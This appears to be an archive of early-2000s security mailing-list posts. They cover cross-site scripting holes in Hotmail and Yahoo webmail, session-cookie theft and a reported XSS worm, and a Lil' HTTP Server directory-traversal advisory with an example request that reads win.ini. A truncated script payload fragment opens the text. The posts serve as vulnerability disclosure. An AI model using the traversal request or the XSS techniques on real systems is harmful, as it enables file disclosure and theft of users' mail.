e%20able%20to%20do%20this!!!)/SCRIPT

Re: Cross site scripting in almost every mayor website

[Berend-Jan Wever]

Been there, done that.

I have successfully created a worm and tested it 
before trying to report this to McAfee, they do the 
vrus scanning for hotmail. I got a you are not a 
registered user auto-reply and they ignored my 
messages because I wasn't in their files ;( too bad 
for them.
You do have full access to the DOM of Hotmail 
when you can find a way to cross-site script, thus 
allowing you full access to the inbox, address 
book etc...

BJ
- Original Message - 
From: FozZy 
To: [EMAIL PROTECTED] 
Cc: [EMAIL PROTECTED] ; vuln-
[EMAIL PROTECTED] 
Sent: Sunday, April 21, 2002 3:53
Subject: Re: Cross site scripting in almost every 
mayor website


To webmail developpers : there is something 
interesting for you hidden in this post. The 
Hotmail problem was a evil html filtering problem 
in incoming e-mails. It was possible to bypass the 
filter by injecting javascript with XML, when 
parsed with IE.  See :
http://spoor12.edup.tudelft.nl/SkyLined/docs/ie.hot
mail.howto.css.html

*** I guess that many other webmails are 
vulnerable to this attack. ***

I verified that Yahoo is vulnerable with IE 5.5 (but 
they have other bugs and they don't care, see 
http://online.securityfocus.com/archive/1/265464). 
I did not checked other webmails, but I am sure 
almost every one can be cracked this way.

 The fix: as far as I could find out they now 
replace 
 the properties 'dataFld', 'dataFormatAs' 
 and 'dataSrc' of any HTML tag 
 with 'xdataFld', 'xdataFormatAs' and 'xdataSrc' 
to 
 prevent XML generation of HTML alltogether.

The implication of executing javascript is that an 
incoming email can control the mailbox of the 
user.  It is also possible to send the session 
cookie to a cgi script and read remotely all the e-
mails. (BTW, it is still possible to do that on 
Hotmail and on almost every webmail, since they 
don't check the IP address, even without this XML 
trick cause their filters are sooo bad) 
I fear that a cross-platform and cross-site webmail 
worm deleting all the emails and spreading could 
appear in the near future. Please Hotmail Yahoo 
 co, do something before it comes true... 

FozZy

Hackademy / Hackerz Voice
http://www.dmpfrance.com/inted.html

Lil' HTTP Server Directory Traversal Vulnerability

[Matthew Murphy]

Lil' HTTP Server is a Windows HTTP server that supports several features in
a relatively compact application.  It is vulnerable to a classic (stupid)
attack:

http://[target]/../../windows/win.ini

This link will read WIN.INI on Windows 95/98/Me, and with a slight
modification (winnt instead of windows) would do the same on an NT box.
Scott Slater, the author of the tool, assured me that we will look into
this and update it very soon.  This is encouraging to me, but the ease with
which this attack is conducted scares me.